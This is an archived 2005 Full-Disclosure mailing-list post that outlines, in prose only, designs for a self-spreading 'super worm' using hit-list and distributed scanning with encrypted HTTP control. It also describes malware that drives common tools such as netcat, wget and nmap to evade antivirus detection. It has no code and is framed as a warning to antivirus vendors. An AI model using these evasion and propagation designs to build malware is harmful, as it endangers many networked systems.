[Full-Disclosure] Narmacil project : The super worms : does it already exist?

• Previous message: mikx: "[Full-Disclosure] Firescrolling [Firefox 1.0]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 25 Feb 2005 10:44:05 +0100
To: full-disclosure@lists.netsys.com

Hello
Since a few month, I've been working on viruses (especially about the
evolution of viruses) and I started to create a small theory (that I
called Narmacil) about advanced viruses that I will post here. My goal
is not to help viruses makers but to show how viruses can evolve and
which methods the super worm (that everybody is waiting for) could
use.

Before, sorry for my (perhaps bad) english !!!

My goal is to introduce you 2 types of malwares almost perfect having
never been implemented for a natural size use. For information, some
projects nevertheless were carried out. This message will not be
followed by examples' codes because one advised me to drop out my
project of perfect worm/virus and nothing to publish quite simply
because it could create an unjustified panic on the Net and mainly
because of the new laws as a vigor (In France, the country where I
live).
For the persons who could be interested, this project followed 6 rules
(being able to work on windows and unix systems, being
invisible/polymorphic, being able to download the parts of code
missing to him, adaptable to all the desires of its creator, being
powerful on the infected system, not modifying the system) and a key
sentence: "the viruses which succeeded best (in term of survival) are
those which acquire a certain longevity because they don't do anything
other to reproduce and remain invisible".

Now the 2 types of worms/virus of my project.

I] the super worm

It could use 2 gold techniques: the "Hit-list scanning" and the
"distributed scanning". The viruses using these techniques have also a
routine making possible to the worm/virus to update itself and to be
controllable (it becomes a Trojan horse then) using tunnels
encapsulated by HTTP and encrypted.

    *

Hit-list scanning: the worm 's 1st event contains a list of
potentially vulnerables machines (a list created by the author of the
virus). With each duplication it transmits, to the new worms created,
the half of the list, then removes the bequeathed part of its code and
so on to each new duplication. While combining that with another
technique which consists in integrating a very great number of
obfuscation's codes and dustbins codes in the 1st event of the worm,
with each duplication, the new worms created will take half of the
codes previously quoted.

The "hit-list scanning" technique has two advantages: the worms does
not really need an polymorphism's engine because to each duplication,
it makes possible to decrease the size of the new worms created,
besides the code of each new worms created is different from his
creator (thanks to the codes of obfuscation).

    *

Distributed scanning: it differs very slightly from the "Hit-list
scanning" by the fact that to each duplication, the father worm
transmits Hit-list in his totality. Then by a mechanism of distributed
scan, the worms will assure themwelves the fact that they will not
infect a system with 2 recoveries.

II] the polymorphic malware pluripartite with variable and distributed
architecture

Then, I imagined this new type of malware (I've said "imagined"
because I did not find a malware of this type yet) at the time when I
started to have evil to continue to code perfectly my super worms
(preceding paragraph). Here its description:

The malware is rather a whole of small tools ensuring each one a task
and being used in the life everyday (excepted the supervisor...).

Then, it has an distributed architecture and variable because it is
composed of small tools (perhaps) already present on the victims'
systems (the test I carried out used netcat, wget, nmap, tcpdump, a
program allowing to put and extract viruses from files image (coded
for the occasion): in fact it is simple a software of steganography).

I started from the principle the victims have already netcat, wget,
nmap and a ftp serveur on their systems. The only tools I will have to
introduce into the target systems are the supervisor and the
steganography's program. The goal of this attack is to create a
complete virus/worms not being able to be detected and removed by the
antiviruses, it is for that this type of malware use tools which
cannot be detected like viruses and which can pass through antiviral
analysis because they are tools used by a lot of people (like nmap,
who would have idea to detect nmap like a virus?). The only tool
really unknown is the supervisor: this tool will drive the other tools
(that one can describe as healthy programs) according to its goal (let
us not forget that it is a malware). The other tools must be
controllable by the shell. The other programs necessary for the attack
will be downloaded by ftp (or wget for example) in a compressed and
encrypted form...

By studying the 3 types of antiviral analysis, we see well that the
supervisor will pass successfully the heuristics and the spectral one
because it does nothing but launch programs that all administrators
and professionals should use. Knowing that the analysis by signature
is rather limited, we hold the virus which could make beautiful damage
on the Net. This type of malware can be improved of all the ways that
one wants, for example: a virus having the same architecture, but the
developed tools are written in a multi platform language and are
compressed/encrypted (some firewalls and antiviruses will not like
that lol). The purpose of the supervisor will be to decompress them,
them decipher, launch them, then to compress again and encrypt with
another key.

Well, it's finished, I hope this message will be used for something,
mainly to show the antivirus' editors they have to improve their
antiviral techniques and the viruses have not finished
evolving/moving. Like I mentioned it above, I have not included the
codes I had started to write.

PS: I'm working on other methods for advanced viruses but before how
do you think the 2 methods this article introduce you?

 - Gilbert Nzeka (aka Dark Khaalel)
 - Writor of a french security book ("La protection des sites
informatiques face au hacking")
 - www.nzeka-labs.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: mikx: "[Full-Disclosure] Firescrolling [Firefox 1.0]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]